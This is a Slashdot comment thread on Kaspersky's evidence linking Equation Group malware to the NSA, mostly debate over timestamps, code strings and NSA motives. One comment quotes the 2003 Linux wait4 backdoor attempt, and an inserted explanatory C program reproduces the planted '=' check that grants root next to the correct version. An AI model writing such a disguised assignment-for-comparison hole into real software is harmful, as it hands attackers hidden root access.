New Evidence Strengthens NSA Ties To Equation Group Malware
An anonymous reader writes: When researchers from Kaspersky Lab presented the Equation Group espionage malware, many in the security community were convinced it was part of an NSA operation. Now, Kaspersky has released new evidence that only strengthens those suspicions. In a code sample, they found a string named BACKSNARF_AB25, which happens to be the name of a project in the NSA's Tailored Access Operations. Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States. The authors also tended to work Monday through Friday, and not on the weekends, suggesting a large, organized development team. "Whereas before the sprawling Equation Drug platform was known to support 35 different modules, Kaspersky has recently unearthed evidence there are 115 separate plugins. The architecture resembles a mini operating system with kernel- and user-mode components alike."
Boy am I glad (Score:1)
I am glad our best and brightest are better than their best and brightest... keeping us safe from cyber-terrorism is a huge priority.
Re: (Score:2)
Except we're getting caught and they aren't.
Who's cool now?
Re: (Score:1)
Except we're getting caught and they aren't.
Doesn't seem to matter. Business is good.
Re: (Score:2)
Seriously this is sloppy work. Esp. if the dates and ties also correlate to Federal holidays. Haven't they ever heard of scheduled build jobs? Pick a random time in a 24 hour range. Also make sure to cover weekends and holidays.
Re: (Score:2)
Either it's sloppy work, or a devilishly clever band of Russian hackers. You choose.
A few embedded strings and timestamps? (Score:3, Interesting)
Re: A few embedded strings and timestamps? (Score:3)
I was about to say the exact same thing; only Newfoundland and a few Caribbean islands are UTC-3. It was those Canuckistanis, I tell you.
Re: (Score:2)
...never UTC-3 unless someone is working very early hours. So it seems like weak evidence indeed!
AFAIK working early doesn't change your timezone, unless you're a pilot or long-distance driver (if it did I probably would have lapped my office a few times by now).
UTC-3 seems to only cover part of Greenland and Brazil, both well-known hotbeds of hacker activity. I suspect that the timezone information is as accurate as info found in random strings in the malware (BACKSNARF_AB25: darn it, time to change the combination on my luggage again...).
Re:A few embedded strings and timestamps? (Score:5, Insightful)
What the summary said was that the timestamps are consistent with an 8-5 day in those time zones, not that the timestamps came from those timezones. Timestamps aren't UTC anything -- they're milliseconds since epoch (generally), and the OS converts on the fly when displaying. I can't speak for the NSA, but core hours are 10-3 for many government workers, and many people go in to the office early to beat traffic. Also, the NSA is under the DoD, and DoD tends to get an early start. All of that is consistent with what one would expect to see.
And to address the GP, the odds of finding a string that matches a codeword, especially a unique codeword, are very slim. Probably millions to one. You're not going to find, say, "XKEYSCORE" in Microsoft or Apple source code. That's the most convincing evidence -- the timestamp stuff is just icing.
I expect to see future exploits released with standardized timestamps and obfuscated strings.
Re:A few embedded strings and timestamps? (Score:4)
You're not going to find, say, "XKEYSCORE" in Microsoft or Apple source code.
Ha, are you really sure about that?
Re: (Score:2)
No. ;)
Re:A few embedded strings and timestamps? (Score:5, Insightful)
I mean, are the only software developers who work normal business hours on normal workdays in the Eastern timezone all working for the NSA?
Very few regular businesses in the eastern USA hire hackers to attack others, so most hackers have much more varied time allocations reflecting that they do it after work / on weekends or are unemployed. The hours strongly suggest employees, so what other employer seems likely to you?
Re: (Score:2)
XKEYCODE can be found in a very large OSS software package and was there before the NSA even imagined using the letters for themselves.
Re:A few embedded strings and timestamps? (Score:5, Insightful)
I'd expect the odds of the NSA accidentally embedding the same strings in multiple exploits to be around 100%. They're humans, they're lazy, they copy stuff and they want readable code. Why wouldn't they?
Re: (Score:2)
I'd guess it as weak, but not really weak. Sort of "reasonable ground for suspicion", but clearly not "reasonable grounds for belief".
Re: (Score:2)
... Unless it was put there on purpose, to mislead you into thinking ... it was the NSA.
Seriously, this takes 0 work to make it appear to be the NSA, a 5 minute script could do this to anything, based on the minute level of detail you seem to think is sufficient.
Re: (Score:3)
Unless I am mistaken, the Washington, USA, area runs on UTC-5 when on Eastern Standard Time and UTC-4 when on Eastern Daylight Time; never UTC-3 unless someone is working very early hours. So it seems like weak evidence indeed!
Funny how this is weak evidence, but stuff like this is what they used to say North Korea hacked Sony.
Re: (Score:2)
Prove you are not a serial murderer. If someone has the means to do something it is very difficult to prove they did not do it. That is why the burden of proof is always on the prosecutor to prove a suspect did a crime and not on the suspects to prove they did not do it.
Re: (Score:2)
Well, I certainly have been guilty of trashing a few DB-9 plugs in my day.
RS-232 was never my favorite protocol.
Re: (Score:2)
Well, the US was quite happy to claim that the coding style was similar so the North Koreans hacked Sony, so they've set the bar so low for what "smoking guns" are going to be.
BACKSNARF_AB25 = signed confession (Score:1)
It includes the name of the program, as known from the Snowden documents, so it's a SIGNED CONFESSION.
Re: (Score:2)
Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States
Um, the US is on UTC -5:00 (ET) through UTC -8:00 (PT). My money is on those pesky Greenlandic uber-hackers.
Um, the UTC is -4:00 (EST) through UTC -7:00 (PST) when on Standard Time. The UTC offset is -5:00 through -8:00 when the US is on Daylight Time. The exception to this is the majority of Arizona which doesn't change at all.
Re: (Score:2)
Um, the US is on UTC -5:00 (ET) through UTC -8:00 (PT). My money is on those pesky Greenlandic uber-hackers.
Um, the UTC is -4:00 (EST) through UTC -7:00 (PST) when on Standard Time. The UTC offset is -5:00 through -8:00 when the US is on Daylight Time. The exception to this is the majority of Arizona which doesn't change at all.
Whoops...Standard is -5 through -8 and Daylight is -4 through -7, my bad.
Scenario (Score:4, Interesting)
Hypothetical Scenario: I work as a coder for the NSA, I work with an extremely talented group, we code the latest, most aggressive malware available.
We make the Russians look like Girl Scouts.
How much do you think they pay me?
How much could I make selling the stuff I code at the NSA to various "businesses".
Does anyone in that position believe in nationalism?
Re: (Score:2)
How much will you be dead and unable-to-ever-be-buried if the NSA finds out?
Re:Scenario (Score:4, Funny)
As much as Snowden is.
Re: (Score:2)
Snowden was an IT guy. A flunky.
Sorry to break it to all you other IT guys. He was not a top-realm coder. Very few 'IT guys' are top-realm coders.
Re: (Score:3)
Snowden was the guy. He didn't get caught until he outed himself to give the leaks credibility. Of course, if he was doing espionage he just would have kept his mouth shut and accepted money.
What is more likely is that NSA contractors have jobs moonlighting for large corporations as intelligence officers and simply use NSA resources at work for their c
Re: (Score:1)
NSA do poke their fingers into commercial interest.
Personally I think the majority of the work they do is related to finance in some fashion.
Re:Scenario (Score:5, Insightful)
How much do you think they pay me?
You can look at the careers on their website. Exploit Engineer pays $64,923 to $96,931. I'm sure that matches up with a GS payscale number somewhere, but I'm too lazy to map it.
How much could I make selling the stuff I code at the NSA to various "businesses".
Not much, or at least not for very long. You can bet your ass you sign an ironclad NDA, and if anyone's going to know whether you violated that, it's the NSA.
Does anyone in that position believe in nationalism?
Most of them, yes. Employment is actually pretty competitive, and people don't become government employees for the money. Job security, maybe, but the money is usually below average.
Re: (Score:2)
only because the private sector average is eroding rather rapidly. It was at one time higher pay in the private sector but thanks to 30 years of economic policy that has changed.
Re: (Score:2)
Compared to the average person in your same field, with your same skills, as an expert coder/hacker/etc? Not even close.
Federal jobs are great if you're a lower skilled worker, whether office or otherwise (although good luck getting those jobs, as many of the ones the government used to have are now contracted out to save money). The higher your skills, and the more in demand your position, the worse the pay disparity with your counterparts in the private se
Re: (Score:2, Interesting)
Does anyone in that position believe in nationalism?
If I didn't believe that most of them do, I wouldn't be so frightened.
There's no one capable of doing more evil than those who sincerely believe that they're doing good.
"Exploit Engineer" (Score:3)
Re: (Score:2)
At a guess:
Almost ALL of them start out believing fervently in US nationalism. Then they spend a few decades in internal bureaucracy and become both cynical and disgusted. Some of them become more disgusted, and others become more cynical.
Re:Scenario (Score:5, Insightful)
My dear friend, you do not understand how these things work.
You work at NSA, you are always using the latest, newest, biggest, baddest, sweetest technology ever devised by men [nsa.gov]. You literally have computer companies begging you to buy their stuff. For a lot of these people (heck, that may even include me) that is motivation enough.
AND, if you are discreet about it, you can even be privy to potentially very lucrative [buzzfeed.com] a lot of state secrets [theguardian.com]. Or even personal secrets, who knows? [pcworld.com]. Obviously, if Snowden gave us something, it is the knowledge that NSA is not very good at information compartmentalization...
But here is the kicker: if you ever decide to leave the NSA, for retirement or otherwise, the private sector (at least the US private sector [bloomberg.com]) will greet you with open arms and pay you a sh*tload of money to work as a consultant or senior manager [cryptome.org]. And we are talking about a SH*TLOAD of money, conflict of interests be damned [bloomberg.com]. You are now one of the big boys, kid, enjoy your (semi-)retirement.
No need to betray US interests, no need to reveal super secret information: you are NSA. You are above the law. Just leave your morals at the door, please.
Re: (Score:1)
You don't have the clearance for this thread.
Re: (Score:2)
The best hardware, leanest algorithms, most interesting problems, and probably the only group of people within 200 miles that gets your jokes.
Hahahahaha. What a joke. (Score:1)
Do me a favour. Spooks putting strings identifying their top secret programme by name into malware? Jesus Christ you people are gullible.
Re: (Score:2)
I was thinking just about the same thing.
Why don't hackers call their projects "8d 7d 6c 05" or "33 02 ba 9c" in source code constants?
Why would they even include any non-essential things in the code at all?
Re:Hahahahaha....But Wait! (Score:1)
I was thinking just about the same thing.
Why don't hackers call their projects "8d 7d 6c 05" or "33 02 ba 9c" in source code constants?
Why would they even include any non-essential things in the code at all?
Remember the Nimda virus? (That's "admin" backwards.)
NIMDA was a polymorphic plague of a virus that hit our network right after 9/11/2001.
It would write itself all over every file on the disk drive until the drive was full and everything came to a screeching halt. It exploited the NT web service that was active by group policy default on client boxes with NT and/or Win 2000. Anyway, our software engineers looked inside the Nimda.dll and there was some jihad "Death to America, Death to Israel" crap comme
Re: (Score:3, Insightful)
> Do me a favour. Spooks putting strings identifying their top secret programme by name [...]
The alternative is thrilling too: malware authors knowing the names of top-secret NSA programmes (I assume this malware was hacked together pre-Snowden)? Hmmm.
I don't know the name of the razor to apply here. But it's a hell of a razor, for sure.
Re: (Score:2)
Hope and Belief.
How leet can they be? (Score:5, Funny)
If they don't bother to change the timestamps to 03/13/37.
Re: (Score:2)
Because there's no month 13 (in the Julian calendar) and no day 37 (again, Julian) and I would suspect a lot of hackers don't use the mm/dd/yy notation but the yy/mm/dd notation.
Re: (Score:2)
Why not 6/31/xxxx? Or 316xxxx?
That would give the security guys a headache.
And code written on Mondays sucked (Score:1)
Rats hoisted by their own profiling petard.
Let's roll our own Time Zones too! (Score:2)
Maybe someone needs to look up just what parts of the world actually use UTC-0300 [wikipedia.org].
Re: (Score:1)
So, you work at a government contractor on the East Coast (VA/DC/MD anyone...nah no gov't contractors there). These type of workers start early AM, before most people are awake for the day. 7-8 AM start times are not unheard of. This would coincide with what? A 9-5 workday in UTC-0300 or UTC-0400 you say? No, can't be. The people writing the article really, truly meant the elite uber-hackers of Greenland and Nova Scotia.
Re:Let's roll our own Time Zones too! (Score:4, Insightful)
"[...] modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones"
When writing an article of this sort your goal should be to _explain your position_, not to create a math problem which, if solved in the correct manner, suggests what your position could be. If the authors wanted to point to a 7-3 work day in UTC-5, they should have simply said so instead of going out of their way to state something quite different.
It's not hard.
Here, it could look something like this:
"[...] modification timestamps were almost always consistent with a 7-3 workday in the US Eastern timezone (UTC-5), allowing for standard Daylight Savings changes as observed in Virginia, DC and Maryland"
It should not look like this:
"[...] modification timestamps were almost always consistent with an 8 PM - 5 AM workday in the UTC+9 time zone, showing that this was clearly the work of North Koreans with insomnia"
Do you see the difference?
Re: (Score:2)
Typically, you won't see the timestamps of when people worked, but when the builds were run.
It doesn't point anywhere, because there's no telling when companies run their builds. Some run nightly builds, others continuous builds.
Re: (Score:2)
> Typically, you won't see the timestamps of when people worked
Because programmers worth any kind of salt don't manually check in (commit) their own changes?
Re: (Score:2)
They check in the source code, not the object files.
The object files won't have the time stamp of the commit of a source file, but the timestamp of when they were created by a build.
Recall the Linux Back door attempt (Score:1)
If you remember when some agent broke into a Linux source repository and added a disguised backdoor attack?
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
Effectively letting them get root, if they passed those flags into the wait4 call.
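Why that one-character difference mattered is easiest to see side by side. The following is an added example, not the kernel's code and not from the comment above: a simplified model of the quoted check (the task struct and flag values are stand-ins) next to the comparison it should have been, so the side effect of the '=' and the fact that the error branch never runs are both visible.

```c
#include <errno.h>
#include <stdio.h>

/* Stand-ins for the kernel's task struct and wait4 flags (assumed values,
 * only the shape of the check is modelled). */
#ifndef __WCLONE
#define __WCLONE 0x80000000u
#endif
#ifndef __WALL
#define __WALL 0x40000000u
#endif
struct task { unsigned uid; };

/* The 2003 version: '=' stores 0 into uid, the assignment expression has
 * the value 0, so the error branch never runs and the caller is now uid 0.
 * Because the assignment is already parenthesised, GCC's -Wparentheses
 * does not flag this line; review has to look at the operator itself. */
int wait4_check_backdoored(struct task *current, unsigned options) {
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What a genuine check looks like: compare, never assign. Rejects the flag
 * combination only for a caller that really is uid 0, and changes nothing. */
int wait4_check_intended(const struct task *current, unsigned options) {
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

int main(void) {
    struct task t = { 1000u };
    int rv = wait4_check_backdoored(&t, __WCLONE | __WALL);
    printf("backdoored: retval=%d, uid afterwards=%u\n", rv, t.uid);
    struct task u = { 1000u };
    rv = wait4_check_intended(&u, __WCLONE | __WALL);
    printf("intended:   retval=%d, uid afterwards=%u\n", rv, u.uid);
    return 0;
}
```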
But, In the End, We need (Score:1)
Our NSA had damn well better be better than Putin's and Li Keqiang's, or all of us in the US are going to be irretrievably harmed.
Planted? (Score:1)
1. Fake the time stamps to look like the eastern US
2. Add a well known NSA project name to the code
3. "Leak" information about these issues.
4. Profit
Could this information be a plant to point the finger at the NSA?
Do as I say not as I do (Score:1)
Wasn't the US government condemning the hack of Sony pictures and instituting economic sanctions based on some shaky evidence that North Korea was involved? I wonder what actions the 42 plus countries that have been infected with Equation Group malware should take against the US government.
Ah...Time Zones...Such tricky things. (Score:1)
From the article: "Assuming they worked a regular 8 to 5 workday, the timestamps show the employees were likely in the UTC-3 or UTC-4 time zone, a finding that would be consistent with people working in the Eastern part of the US."
Neither UTC -03:00 nor UTC -04:00 are associated with the Eastern US.
UTC -03:00 is associated with: Buenos Aires, Montevideo, São Paulo
UTC -04:00 is associated with: Santiago, La Paz, San Juan de Puerto Rico, Manaus, Halifax
UTC -05:00, however, is however, associated with Eas
Not much in the way of evidence (Score:1)
Timestamp silliness (Score:2)
For a largish project I would suspect that the release builds are run over night, CI builds during the work day.
doesn't sound right (Score:2)
Re:Kaspersky Lab (Score:5, Insightful)
I am not too worried about Putin.
What I am worried about is this: the Equation malware was used years ago. We know these guys are good at what they do. Very good.
NSA has been working on that stuff since the 1950s -- that's 65 years of experience, folks, and they have been big computer users since day ONE -- heck even before day one, if you count Bletchley Park and stuff like the cracking of Red, Purple and JN cyphers [wikipedia.org].
So, we are talking about an organization that has huge experience in cracking systems and crypto, and the enormous budget to support its activities.
So: what have they been producing between Equation and, let's say, Stuxnet, and today?
Equation was -- from what I understand -- fairly Windows specific. What have they got now? The stuff coming out of all these not-so-funny super top secret projects?
Here is a hint: combine stuff like Heartbleed (OpenSSL), ShellShock, stuff that lingered in code bases for decades before being found out, maybe other stuff such as a few rumors about OpenSSH backdoors (remember those? [slashdot.org]) and the "let me install myself cosily in your HDD BIOS where you cannot dislodge me" capabilities of Equation and, presto! No one is safe from the prying eyes of NSA anymore.
That's the kind of thing that makes you lose sleep at night. At least, I do lose sleep over it. George Orwell had nothing on these guys.
What if you are only running open-source? Vulnerable. Audited open-source? They have 100 times the manpower of the best programming teams out there. Heck, they may even have infiltrated these projects in the first place!
And don't forget one last thing: the guys are masters of misdirection. NSA and GCHQ and everyone in between said for years that Enigma was safe to use, even after the end of WWII. It's extremely simple for these people to say (unofficially, of course) "Drats! This guy is using open source! Foiled again! Damn you open source programmers!! Damn you all to hell!!!", all the while exploiting Linux/BSD machines as easily as "1-2-3". And we know they like subtle.
So, here is the question: what do they have, right now, that we don't know about? Think about that for a second.
Re: (Score:2)
Hey, you know the UK government shared all the secrets of Bletchley Park with the US government, right?
Re: (Score:2)
What do you mean? The known unknowns or the unknown unknowns?
I used to think I knew what I didn't know, now I don't know...
I now know I need a lot more foil!
http://www.amazon.com/Durable-Packaging-92410-Heavy-Aluminum/dp/B00KNM30UM [amazon.com]
The really troubling part (Score:3)
And if the Senators or POTUS get uppity, well no one that achieves those offices are innocent, thus they are completely blackmailable, if not subject to out and out threats (especially their families).
I think this is the main reason every man that now becom
Re: (Score:2)
I don't know if it's still true, but several years ago I was told that there are rainbow tables that permit relatively easy login to Linux systems. To foil that you need to have a limited number of login attempts per day, probably implemented by an increasing time limit since the last bad login...and I've never seen that as an option on a Linux system. (I'm sure it is, because it's a dead-simple obvious approach. It might require you to unplug from the net to login while you were under attack, but that's
Re: (Score:2)
With a rainbow table you can brute-force a password if you know the password hash. You need only one login attempt -- and you need the hash, for which you normally need root access to start with, at least for the last 20 years. Unix/Linux passwords have always been stored as salted hashes, which makes rainbow tables not practical. The practical way to brute-force a password is therefore a dictionary attack.
Re: (Score:2)
A rainbow table might not be practical for you and I, but might be practical for the NSA. But as you say, it assumes you have the passwd hash table already. In the old days it was exposed in /etc/password, but that hasn't been the case in decades.
Re: (Score:2)
If the NSA can remove the effects of the salt in order to use a rainbow table, they've cracked the hash, and don't need a rainbow table. If not, even a two-byte salt would increase the size of the rainbow table by 65,536 times, and I doubt the NSA is going to use tables that much bigger than they need. They'd almost certainly do a dictionary attack and other things, which essentially means building a rainbow table as they go. It's more computation, but, really, this is the NSA.
Even if the NSA has root
Re: (Score:2)
I don't doubt the NSA has been doing nefarious things since the 50s, but I suspect their more outlandish things like this have taken shape since 9/11.
Re: (Score:2)
Let's hear it for the pulling-shit-out-of-our-collective-asses system! The same goes for any software made by any company in the world... Unless you can see the source and it is open, you can't but hope. Why not say it is Snowden who did this so he can sell botnets to Putin? If you have a shred of evidence that Putin has backdoored Kaspersky, then bring it to light.
Re: (Score:1)
I do not think bringing Snowden into the example really works on this one, as he did actually steal classified info and post it to the internet/news, no belief needed. I do hope he gets a fair and public trial though, but I believe he will never make it to court.
Re: (Score:1)
I do not think bringing Snowden into the example really works on this one, as he did actually steal classified info and post it to the internet/news, no belief needed. I do hope he gets a fair and public trial though, but I believe he will never make it to court.
Edward Snowden never publicly released any classified information. The media organisation entrusted with the document collection provided by Snowden have been releasing albeit at a trickle-pace any and all such classified documents. Yet the media organisations are not being shutdown or the owners, editors, journalists arrested and charged. Nope. But Edward Snowden, for unfathomable reasons, is State Enemy #1 according to the Government of the United States of Amerika.